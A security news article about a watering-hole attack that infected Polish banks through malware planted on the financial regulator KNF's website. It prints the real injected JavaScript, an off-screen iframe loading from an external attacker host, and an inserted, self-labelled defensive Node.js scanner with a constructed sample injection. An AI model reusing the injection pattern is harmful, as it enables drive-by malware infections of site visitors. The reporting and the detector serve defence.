Crooks hacked Polish banks with malware planted on a government site

Several Polish banks confirmed their systems were infected with malware after their staff visited the website of the Polish Financial Supervision Authority.

Polish banks are investigating a massive cyber attack after malware was spotted on several of the financial institutions' servers.

The cyber attack was first reported on Friday last week by Zaufana Trzecia Strona, a Polish news site.

The interesting aspect of the attack is that the crooks used the website of the Polish financial regulator, the Polish Financial Supervision Authority (KNF), to spread the malware.

A spokesman for the KNF confirmed that the regulator's internal systems had been compromised by hackers “from another country”. The attackers planted on its servers the malicious files that were used in the attacks against the Polish banks.

To keep the malware from spreading further, the authorities decided to shut down the entire network at the KNF “in order to secure evidence.”

The malware-based attack was confirmed by a number of banks that are currently investigating the security breach.

The banks' IT staff noticed anomalous network traffic and unrecognized executables on several servers.

“It has been a busy week in SOCs all over the Polish financial sector. At least a few of Polish 20-something commercial banks have already confirmed being victims of a malware infection while others keep looking. Network traffic to exotic locations and encrypted executables nobody recognized on some servers were the first signs of trouble,” reported the badcyber.com website. “A little more than a week ago one of the banks detected strange malware present in a few workstations. Having established basic indicators of compromise, it managed to share that information with other banks, who started asking their SIEMs for information. In some cases, the results came back positive.”

According to the first findings of the investigation, the attackers had compromised the KNF's website and modified one of the site's JavaScript files.

Ironically the KNF is the regulating body that monitors and promotes security measures adopted by Polish banks.

The modified JS file caused the browsers of visitors to the KNF website to load an external JS file, which then downloaded the malware from an external server and installed it.

The unauthorized code was stored in the following file:

http://www.knf.gov.pl/DefaultDesign/Layouts/KNF2013/resources/accordian-src.js?ver=11

and looked like this:

document.write("<div id='efHpTk' width='0px' height='0px'><iframe name='forma' src='https://sap.misapor.ch/vishop/view.jsp?pagenum=1' width='145px' height='146px' style='left:-2144px;position:absolute;top:0px;'></iframe></div>");
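The snippet above shows the usual watering-hole pattern: a script that belongs to the site writes an iframe pointing at a host the site does not own, pushed off-screen so the visitor never sees it. The scanner below is an added example, not code from the article, from KNF or from badcyber.com. It takes the text of a JavaScript file, finds any iframes the script writes into the page, checks whether each one loads from a host other than the site's own and whether it is concealed (negative offset, zero size, display:none), and returns the hosts of suspicious frames so they can be pushed to a SIEM or proxy watchlist. The site host is taken from the article's URL; the sample scripts, including the frame host `malicious.example`, are constructed for the example.

```javascript
// Added example, not code from the article or from KNF/badcyber.com: scans a
// script for iframes injected into the page that point at an external host
// and are hidden from the visitor, as in the watering-hole injection above.

// Host of the site whose script is being checked (from the article's URL).
const SITE_HOST = 'www.knf.gov.pl';

// Constructed sample with the same structure as the injected snippet; the
// frame host 'malicious.example' is a placeholder, not a real indicator.
const SAMPLE_INJECTED = `document.write("<div id='x1' width='0px' height='0px'>` +
  `<iframe name='forma' src='https://malicious.example/view.jsp?pagenum=1' ` +
  `width='145px' height='146px' style='left:-2144px;position:absolute;top:0px;'>` +
  `</iframe></div>");`;

// Constructed benign control: a visible, same-origin frame.
const SAMPLE_BENIGN =
  `document.write('<iframe src="/widgets/rates.html" width="300" height="200"></iframe>');`;

// Parse attr="value" / attr='value' pairs from an iframe's attribute list.
function parseAttrs(attrText) {
  const attrs = {};
  const re = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)')/g;
  let m;
  while ((m = re.exec(attrText)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] !== undefined ? m[2] : m[3];
  }
  return attrs;
}

// Parse "prop:value;prop:value" inline CSS into an object (lower-cased).
function parseStyle(styleText) {
  const style = {};
  for (const decl of (styleText || '').split(';')) {
    const idx = decl.indexOf(':');
    if (idx > 0) style[decl.slice(0, idx).trim().toLowerCase()] = decl.slice(idx + 1).trim().toLowerCase();
  }
  return style;
}

// Numeric part of a CSS length such as '-2144px'; NaN when absent or non-numeric.
function px(value) {
  return value === undefined ? NaN : parseFloat(value);
}

// Hostname the frame loads from, resolving relative URLs against the site itself.
function frameHost(src, siteHost) {
  try {
    return new URL(src, `https://${siteHost}/`).hostname.toLowerCase();
  } catch (e) {
    return null; // unparsable src: treated as unknown, hence external
  }
}

// Ways in which a frame is kept invisible to the visitor.
function concealmentReasons(attrs) {
  const reasons = [];
  const style = parseStyle(attrs.style);
  if (px(style.left) < 0 || px(style.top) < 0) reasons.push('offscreen');
  if (px(attrs.width) === 0 || px(attrs.height) === 0 ||
      px(style.width) === 0 || px(style.height) === 0) reasons.push('zero-size');
  if (style.display === 'none' || style.visibility === 'hidden') reasons.push('hidden');
  return reasons;
}

// Scan a script's source text; one finding per iframe it contains.
function scanScript(source, siteHost) {
  const findings = [];
  const writesMarkup = /document\.write(ln)?\s*\(/.test(source);
  const re = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = re.exec(source)) !== null) {
    const attrs = parseAttrs(m[1]);
    const host = frameHost(attrs.src || '', siteHost);
    const reasons = concealmentReasons(attrs);
    if (host === null || host !== siteHost.toLowerCase()) reasons.push('external-host');
    if (writesMarkup) reasons.push('document.write');
    // The watering-hole pattern: an external frame that is also concealed.
    const concealed = reasons.some(r => r === 'offscreen' || r === 'zero-size' || r === 'hidden');
    findings.push({ src: attrs.src || '', host, reasons, suspicious: concealed && reasons.includes('external-host') });
  }
  return findings;
}

// Distinct hosts of suspicious frames, ready for a SIEM or proxy watchlist.
function watchlistHosts(findings) {
  return [...new Set(findings.filter(f => f.suspicious && f.host).map(f => f.host))];
}

const injectedFindings = scanScript(SAMPLE_INJECTED, SITE_HOST);
const benignFindings = scanScript(SAMPLE_BENIGN, SITE_HOST);
console.log(JSON.stringify(injectedFindings, null, 2));
console.log('benign suspicious:', benignFindings.some(f => f.suspicious));
console.log('watchlist:', watchlistHosts(injectedFindings));
```

Run it with `node` to see the constructed injected sample flagged as `offscreen` + `external-host` + `document.write` and the benign control left alone. In practice the same check belongs in an integrity monitor that diffs the site's served scripts against a known-good copy; the concealment heuristics only narrow the diff down to frames worth a look, and the external hosts it yields are the indicators the banks in the story were sharing with each other.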

At the time of writing, both the KNF and the Polish government confirmed that there is no indication that the crooks have stolen money from the banks.

“Significantly, we do not so far have any information, related to these attacks, of a successful or unsuccessful attempt to steal funds from bank accounts. This may indicate that the goal of the attackers was information, not money,” reported the local media outlet zaufanatrzeciastrona.pl. “In at least one case, it is known that a large amount of data has been transferred from the bank’s network to external servers, but because the data were encrypted by the criminals prior to transfer, determining what was stolen can be difficult.”

The only certainty is that the incident can be considered the largest system hack ever in the country’s financial sector.

The IOCs are available on the badcyber.com website.

Pierluigi Paganini
